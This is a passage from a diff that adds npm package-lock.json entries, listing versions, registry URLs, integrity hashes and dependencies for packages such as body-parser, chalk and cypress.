"sha512-6TVU49mK6KZb4qG6xWaaM4C7sA/sgUMLy/JYMOzkcp3BvVLpW0fXDFQiIzAuxFCt/2+xD7fNIiPFAoLZPhVNLQ==", + "engines": { + "node": ">=6.0" + } + }, + "node_modules/aggregate-error": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/aggregate-error/-/aggregate-error-3.1.0.tgz", + "integrity": "sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==", + "dependencies": { + "clean-stack": "^2.0.0", + "indent-string": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-colors": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.3.tgz", + "integrity": "sha512-/6w/C21Pm1A7aZitlI5Ni/2J6FFQN8i1Cvz3kHABAAbw93v/NlvKdVOqz7CCWz/3iv/JplRSEEZ83XION15ovw==", + "engines": { + "node": ">=6" + } + }, + "node_modules/ansi-escapes": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", + "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dependencies": { + "type-fest": "^0.21.3" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/arch": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/arch/-/arch-2.2.0.tgz", + "integrity": "sha512-Of/R0wqp83cgHozfIYLbBMnej79U/SVGOOyuB3VVFv1NRM/PSFMK12x9KVtiYzJqmnU5WR2qp0Z5rHb7sWGnFQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" + }, + "node_modules/aria-query": { + "version": "5.1.3", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.1.3.tgz", + "integrity": "sha512-R5iJ5lkuHybztUfuOAznmboyjWq8O6sqNqtK7CLOqdydi54VNbORp49mb14KbWgG1QD3JFO9hJdZ+y4KutfdOQ==", + "dependencies": { + "deep-equal": "^2.0.5" + } + }, + "node_modules/array-buffer-byte-length": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/array-buffer-byte-length/-/array-buffer-byte-length-1.0.0.tgz", + "integrity": "sha512-LPuwb2P+NrQw3XhxGc36+XSvuBPopovXYTR9Ew++Du9Yb/bx5AzBfrIsBoj0EZUifjQU+sHL21sseZ3jerWO/A==", + "dependencies": { + "call-bind": "^1.0.2", + "is-array-buffer": "^3.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/array-flatten": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz", + "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==" + }, + "node_modules/asn1": { + "version": "0.2.6", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", + "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", + "dependencies": { + "safer-buffer": "~2.1.0" + } + }, + "node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/astral-regex": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", + "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/async": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/async/-/async-3.2.4.tgz", + "integrity": "sha512-iAB+JbDEGXhyIUavoDl9WP/Jj106Kz9DEn1DPgYw5ruDn0e3Wgi3sKFm55sASdGBNOQB8F59d9qQ7deqrHA8wQ==" + }, + "node_modules/async-lock": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/async-lock/-/async-lock-1.4.1.tgz", + "integrity": "sha512-Az2ZTpuytrtqENulXwO3GGv1Bztugx6TT37NIo7imr/Qo0gsYiGtSdBa2B6fsXhTpVZDNfu1Qn3pk531e3q+nQ==" + }, + "node_modules/asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" + }, + "node_modules/at-least-node": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/at-least-node/-/at-least-node-1.0.0.tgz", + "integrity": "sha512-+q/t7Ekv1EDY2l6Gda6LLiX14rU9TV20Wa3ofeQmwPFZbOMo9DXrLbOjFaaclkXKWidIaopwAObQDqwWtGUjqg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/available-typed-arrays": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/available-typed-arrays/-/available-typed-arrays-1.0.5.tgz", + "integrity": "sha512-DMD0KiN46eipeziST1LPP/STfDU0sufISXmjSgvVsoU2tqxctQeASejWcfNtxYKqETM1UxQ8sp2OrSBWpHY6sw==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/aws-sign2": { + "version": "0.7.0", + "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", + "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", + "engines": { + "node": "*" + } + }, + "node_modules/aws4": { + "version": "1.12.0", + "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", + "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" + }, + "node_modules/base64-js": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/bcrypt-pbkdf": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", + "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "dependencies": { + "tweetnacl": "^0.14.3" + } + }, + "node_modules/blob-util": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/blob-util/-/blob-util-2.0.2.tgz", + "integrity": "sha512-T7JQa+zsXXEa6/8ZhHcQEW1UFfVM49Ts65uBkFL6fz2QmrElqmbajIDJvuA0tEhRe5eIjpV9ZF+0RfZR9voJFQ==" + }, + "node_modules/bluebird": { + "version": "3.7.2", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.7.2.tgz", + "integrity": "sha512-XpNj6GDQzdfW+r2Wnn7xiSAd7TM3jzkxGXBGTtWKuSXv1xUV+azxAm8jdWZN06QTQk+2N2XB9jRDkvbmQmcRtg==" + }, + "node_modules/body-parser": { + "version": "1.20.3", + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.3.tgz", + "integrity": "sha512-7rAxByjUMqQ3/bHJy7D6OGXvx/MMc4IqBn/X0fcM1QUcAItpZrBEYhWGem+tzXH90c+G01ypMcYJBO9Y30203g==", + "dependencies": { + "bytes": "3.1.2", + "content-type": "~1.0.5", + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "on-finished": "2.4.1", + "qs": "6.13.0", + "raw-body": "2.5.2", + "type-is": "~1.6.18", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/body-parser/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/body-parser/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/body-parser/node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/buffer-crc32": { + "version": "0.2.13", + "resolved": "https://registry.npmjs.org/buffer-crc32/-/buffer-crc32-0.2.13.tgz", + "integrity": "sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==", + "engines": { + "node": "*" + } + }, + "node_modules/bytes": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", + "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/cachedir": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/cachedir/-/cachedir-2.4.0.tgz", + "integrity": "sha512-9EtFOZR8g22CL7BWjJ9BUx1+A/djkofnyW3aOXZORNW2kxoUpx2h+uN2cOqwPmFhnpVmxg+KW2OjOSgChTEvsQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/call-bind": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/call-bind/-/call-bind-1.0.5.tgz", + "integrity": "sha512-C3nQxfFZxFRVoJoGKKI8y3MOEo129NQ+FgQ08iye+Mk4zNZZGdjfs06bVTr+DBSlA66Q2VEcMki/cUCP4SercQ==", + "dependencies": { + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.1", + "set-function-length": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/call-bound": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.3.tgz", + "integrity": "sha512-YTd+6wGlNlPxSuri7Y6X8tY2dmm12UMH66RpKMhiX6rsk5wXXnYgbUcOt8kiS31/AjfoTOvCsE+w8nZQLQnzHA==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.1", + "get-intrinsic": "^1.2.6" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/caseless": { + "version": "0.12.0", + "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", + "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" + }, + "node_modules/celebrate": { + "version": "15.0.3", + "resolved": "https://registry.npmjs.org/celebrate/-/celebrate-15.0.3.tgz", + "integrity": "sha512-ToF8ILq/F0KhQ0CPtexP7Cu9GkqKJ91VKy3ZOCV24aaNWdm3QCHqnXAKfKHrtcM2B2zmPFe11p8WWsQkmq8k4g==", + "dependencies": { + "escape-html": "1.0.3", + "joi": "17.x.x", + "lodash": "4.17.x" + } + }, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/check-more-types": { + "version": "2.24.0", + "resolved": "https://registry.npmjs.org/check-more-types/-/check-more-types-2.24.0.tgz", + "integrity": "sha512-Pj779qHxV2tuapviy1bSZNEL1maXr13bPYpsvSDB68HlYcYuhlDrmGd63i0JHMCLKzc7rUSNIrpdJlhVlNwrxA==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/ci-info": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", + "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/clean-git-ref": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/clean-git-ref/-/clean-git-ref-2.0.1.tgz", + "integrity": "sha512-bLSptAy2P0s6hU4PzuIMKmMJJSE6gLXGH1cntDu7bWJUksvuM+7ReOK61mozULErYvP6a15rnYl0zFDef+pyPw==" + }, + "node_modules/clean-stack": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/clean-stack/-/clean-stack-2.2.0.tgz", + "integrity": "sha512-4diC9HaTE+KRAMWhDhrGOECgWZxoevMc5TlkObMqNSsVU62PYzXZ/SMTjzyGAFF1YusgxGcSWTEXBhp0CPwQ1A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/cli-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-3.1.0.tgz", + "integrity": "sha512-I/zHAwsKf9FqGoXM4WWRACob9+SNukZTd94DWF57E4toouRulbCxcUh6RKUEOQlYTHJnzkPMySvPNaaSLNfLZw==", + "dependencies": { + "restore-cursor": "^3.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cli-table3": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/cli-table3/-/cli-table3-0.6.3.tgz", + "integrity": "sha512-w5Jac5SykAeZJKntOxJCrm63Eg5/4dhMWIcuTbo9rpE+brgaSZo0RuNJZeOyMgsUdhDeojvgyQLmjI+K50ZGyg==", + "dependencies": { + "string-width": "^4.2.0" + }, + "engines": { + "node": "10.* || >= 12.*" + }, + "optionalDependencies": { + "@colors/colors": "1.5.0" + } + }, + "node_modules/cli-truncate": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/cli-truncate/-/cli-truncate-2.1.0.tgz", + "integrity": "sha512-n8fOixwDD6b/ObinzTrp1ZKFzbgvKZvuz/TvejnLn1aQfC6r52XEx85FmuC+3HI+JM7coBRXUvNqEU2PHVrHpg==", + "dependencies": { + "slice-ansi": "^3.0.0", + "string-width": "^4.2.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/colorette": { + "version": "2.0.20", + "resolved": "https://registry.npmjs.org/colorette/-/colorette-2.0.20.tgz", + "integrity": "sha512-IfEDxwoWIjkeXL1eXcDiow4UbKjhLdq6/EuSVR9GMN7KVH3r9gQ83e73hsz1Nd1T3ijd5xv1wcWRYO+D6kCI2w==" + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/common-tags": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/common-tags/-/common-tags-1.8.2.tgz", + "integrity": "sha512-gk/Z852D2Wtb//0I+kRFNKKE9dIIVirjoqPoA1wJU+XePVXZfGeBpk45+A1rKO4Q43prqWBNY/MiIeRLbPWUaA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/content-disposition": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", + "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", + "dependencies": { + "safe-buffer": "5.2.1" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/content-type": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", + "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.7.1.tgz", + "integrity": "sha512-6DnInpx7SJ2AK3+CTUE/ZM0vWTUboZCegxhC2xiIydHR9jNuTAASBrfEpHhiGOZw/nX51bHt6YQl8jsGo4y/0w==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha512-QADzlaHc8icV8I7vbaJXJwod9HWYp8uCqf1xa4OfNu1T7JVxQIrUgOWtHdNDtPiywmFbiS12VjotIXLrKM3orQ==" + }, + "node_modules/core-util-is": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", + "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" + }, + "node_modules/crc-32": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/crc-32/-/crc-32-1.2.2.tgz", + "integrity": "sha512-ROmzCKrTnOwybPcJApAA6WBWij23HVfGVNKqqrZpuyZOHqK2CwHSvpGuyt/UNNvaIjEd8X5IFGp4Mh+Ie1IHJQ==", + "bin": { + "crc32": "bin/crc32.njs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/cross-spawn": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/cypress": { + "version": "13.13.2", + "resolved": "https://registry.npmjs.org/cypress/-/cypress-13.13.2.tgz", + "integrity": "sha512-PvJQU33933NvS1StfzEb8/mu2kMy4dABwCF+yd5Bi7Qly1HOVf+Bufrygee/tlmty/6j5lX+KIi8j9Q3JUMbhA==", + "hasInstallScript": true, + "dependencies": { + "@cypress/request": "^3.0.1", + "@cypress/xvfb": "^1.2.4", + "@types/sinonjs__fake-timers": "8.1.1", + "@types/sizzle": "^2.3.2", + "arch": "^2.2.0", + "blob-util": "^2.0.2", + "bluebird": "^3.7.2", + "buffer": "^5.7.1", + "cachedir": "^2.3.0", + "chalk": "^4.1.0", + "check-more-types": "^2.24.0", + "cli-cursor": "^3.1.0", + "cli-table3": "~0.6.1", + "commander": "^6.2.1", + "common-tags": "^1.8.0", + "dayjs": "^1.10.4", + "debug": "^4.3.4", + "enquirer": "^2.3.6", + "eventemitter2": "6.4.7", + "execa": "4.1.0", + "executable": "^4.1.1", + "extract-zip": "2.0.1", + "figures": "^3.2.0", + "fs-extra": "^9.1.0", + "getos": "^3.2.1", + "is-ci": "^3.0.1", + "is-installed-globally": "~0.4.0", + "lazy-ass": "^1.6.0", + "listr2": "^3.8.3", + "lodash": "^4.17.21", + "log-symbols": "^4.0.0", + "minimist": "^1.2.8", + "ospath": "^1.2.2", + "pretty-bytes": "^5.6.0", + "process": "^0.11.10", + "proxy-from-env": "1.0.0", + "request-progress": "^3.0.0", + "semver": "^7.5.3", + "supports-color": "^8.1.1", + "tmp": "~0.2.3", + "untildify": "^4.0.0", + "yauzl": "^2.10.0" + }, + "bin": { + "cypress": "bin/cypress" + }, + "engines": { + "node": "^16.0.0 || ^18.0.0 || >=20.0.0" + } + }, + "node_modules/cypress/node_modules/supports-color": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", + "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/supports-color?sponsor=1" + } + }, + "node_modules/dashdash": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", + "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", + "dependencies": { + "assert-plus": "^1.0.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/dayjs": { + "version": "1.11.10", + "resolved": "https://registry.npmjs.org/dayjs/-/dayjs-1.11.10.tgz", + "integrity": "sha512-vjAczensTgRcqDERK0SR2XMwsF/tSvnvlv6VcF2GIhg6Sx4yOIt/irsr1RDJsKiIyBzJDpCoXiWWq28MqH2cnQ==" + }, + "node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/decompress-response": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-6.0.0.tgz", + "integrity": "sha512-aW35yZM6Bb/4oJlZncMH2LCoZtJXTRxES17vE3hoRiowU2kWHaJKFkSBDnDR+cm9J+9QhXmREyIfv0pji9ejCQ==", + "dependencies": { + "mimic-response": "^3.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/deep-equal": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-2.2.2.tgz", + "integrity": "sha512-xjVyBf0w5vH0I42jdAZzOKVldmPgSulmiyPRywoyq7HXC9qdgo17kxJE+rdnif5Tz6+pIrpJI8dCpMNLIGkUiA==", + "dependencies": { + "array-buffer-byte-length": "^1.0.0", + "call-bind": "^1.0.2", + "es-get-iterator": "^1.1.3", + "get-intrinsic": "^1.2.1", + "is-arguments": "^1.1.1", + "is-array-buffer": "^3.0.2", + "is-date-object": "^1.0.5", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.2", + "isarray": "^2.0.5", + "object-is": "^1.1.5", + "object-keys": "^1.1.1", + "object.assign": "^4.1.4", + "regexp.prototype.flags": "^1.5.0", + "side-channel": "^1.0.4", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-data-property": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/define-data-property/-/define-data-property-1.1.1.tgz", + "integrity": "sha512-E7uGkTzkk1d0ByLeSc6ZsFS79Axg+m1P/VsgYsxHgiuc3tFSj+MjMIwe90FC4lOAZzNBdY7kkO2P2wKdsQ1vgQ==", + "dependencies": { + "get-intrinsic": "^1.2.1", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/define-properties": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.2.1.tgz", + "integrity": "sha512-8QmQKqEASLd5nx0U1B1okLElbUuuttJ/AnYmRXbbbGDWh6uS208EjD4Xqq/I9wK7u0v6O08XhTWnt5XtEbR6Dg==", + "dependencies": { + "define-data-property": "^1.0.1", + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": 